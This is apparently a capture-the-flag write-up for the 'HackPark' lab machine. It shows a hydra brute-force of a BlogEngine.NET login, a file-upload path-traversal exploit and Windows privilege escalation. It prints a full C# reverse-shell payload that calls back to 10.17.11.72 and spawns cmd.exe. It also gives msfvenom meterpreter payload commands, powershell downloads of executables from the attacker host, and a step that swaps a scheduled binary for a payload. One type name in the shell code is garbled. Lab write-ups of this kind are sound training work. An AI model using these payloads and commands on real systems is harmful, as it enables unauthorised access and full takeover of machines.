HackPark - HackMD

# HackPark ###### tags: `vulnerableMachine` [TOC] # Recon ![](https://i.imgur.com/bqQs9xK.png) ![](https://i.imgur.com/dFrRi5i.png) # Initial Access (Hydra) Get -> request data Post -> send data to server >What request type is the Windows website login form using? ![](https://i.imgur.com/ClqWhzp.png) Ans Post ``` POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1 Host: 10.10.80.169 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 606 Origin: http://10.10.80.169 Connection: close Referer: http://10.10.80.169/Account/login.aspx?ReturnURL=/admin/ Upgrade-Insecure-Requests: 1 ``` ``` __VIEWSTATE=poRNHanBofdZEJXfWH5iZP4zTkj7XJhmuEqa6E2giZykfXp%2FL3hU23Tfj4kWTE8ppNIEhth5%2BxCwgKfUJiQ2%2FePBAR30yZstFi0Ph8vLZ3kStu4xXmAaQahlx%2FrvNbuUa59ion5cB6mHnx5zsIJrDGxLcAiFwMxta90A6nHsRrZBljP2&__EVENTVALIDATION=KQklz%2FU8p3eU9irsMiTantJD%2F84rN%2BNvGwY4XllffH7Il%2Bl%2FemF0CmZk%2FAtqhubSuTmevw2n81iXG2Hq07EOyW4AD33MlP7IrEpWfnnedeLwZgsPGW8yY8OKH16%2F2kXs79GQ%2Bb%2FdgNQPPJtRcNfVb8ahQmW8QvbEjXa43qvaIyCRIFkq&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in ``` ``` hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form ``` -l <-> ^USER^ -P <-> ^PASS^ http-post-form compose ``` http-post-form "login form path:request parameter:expect error message (if account or password is not corect)" ``` --- ``` hydra -l admin -P wordlists/rockyou.txt 10.10.80.169 http-post-form "/Account/login.aspx:__VIEWSTATE=poRNHanBofdZEJXfWH5iZP4zTkj7XJhmuEqa6E2giZykfXp%2FL3hU23Tfj4kWTE8ppNIEhth5%2BxCwgKfUJiQ2%2FePBAR30yZstFi0Ph8vLZ3kStu4xXmAaQahlx%2FrvNbuUa59ion5cB6mHnx5zsIJrDGxLcAiFwMxta90A6nHsRrZBljP2&__EVENTVALIDATION=KQklz%2FU8p3eU9irsMiTantJD%2F84rN%2BNvGwY4XllffH7Il%2Bl%2FemF0CmZk%2FAtqhubSuTmevw2n81iXG2Hq07EOyW4AD33MlP7IrEpWfnnedeLwZgsPGW8yY8OKH16%2F2kXs79GQ%2Bb%2FdgNQPPJtRcNfVb8ahQmW8QvbEjXa43qvaIyCRIFkq&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" ``` ![](https://i.imgur.com/s4mJYKe.png) # Compromise the machine >Now you have logged into the website, are you able to identify the version of the BlogEngine? ![](https://i.imgur.com/YBYlRZx.png) Ans: 3.3.6.0 >Use the [exploit database archive](http://www.exploit-db.com/) to find an exploit to gain a reverse shell on this system. What is the CVE? ![](https://i.imgur.com/0S2yT9t.png) Path traversal + upload file -> RCE BlogEngine.NET 的 "theme" 參數未經過適當地檢查 ### Upload the file PATH http://10.10.80.169/admin/app/editor/editpost.cshtml ![](https://i.imgur.com/yboYk4L.png) >Note that this file must be uploaded as PostView.ascx And, It will be save tp /App_Data/files ### trigger the payload http://10.10.10.10/?theme=../../App_Data/files --- ### Script Upload vim PostView.ascx ``` <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.17.11.72", 443)) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceintArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script> <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> ``` --- Establish TCP connect to our machine ``` using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.17.11.72", 443)) { ``` Generate Shell ``` System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); ``` Our Machine ``` nc -lvnp 443 ``` ![](https://i.imgur.com/ocq8wsf.png) Initial Access ![](https://i.imgur.com/jilc297.png) ![](https://i.imgur.com/4sCHdS4.png) # Windows Privilege Escalation ``` msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=6669 -f exe -o meow.exe ``` ``` python3 -m http.server ``` ``` powershell -c wget "http://10.17.11.72:8000/meow.exe" -outfile "meow.exe" ``` ![](https://i.imgur.com/kxA1mQB.png) ![](https://i.imgur.com/TOij7ag.png) Systems Information >What is the OS version of this windows machine? ![](https://i.imgur.com/zwWLDci.png) ``` wget https://github.com/carlospolop/PEASS-ng/releases/download/20230122/winPEASx86.exe -outfile winPEASx86.exe ``` Vulnerable Service >What is the name of the abnormal _service_ running? ![](https://i.imgur.com/6Bijwsh.png) ``` WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running File Permissions: Everyone [WriteData/CreateFiles] Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles]) System Scheduler Service Wrapper ``` C:\Program Files (x86)\ sc.exe qc WindowsScheduler ![](https://i.imgur.com/Vmea5cu.png) ![](https://i.imgur.com/TqJyDID.png) We can't to stop or start the service (QQ) We have to think another way to trigger our payloads ### Scheduler Event Jobs logs Event/20198415519.INI_LOG.txt ![](https://i.imgur.com/Hb2HmEk.png) Content ![](https://i.imgur.com/230OcDK.png) >What is the name of the binary you're supposed to exploit? we could replace our payload with Message.exe ``` msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=4444 -f exe -o WService.exe ``` ``` mv Message.exe Message.exe.Meow wget "http://10.17.11.72:8000/WService.exe" -outfile "Message.exe" ``` ![](https://i.imgur.com/EXPmo0W.png) >What is the root flag? ![](https://i.imgur.com/ZgCXb5I.png)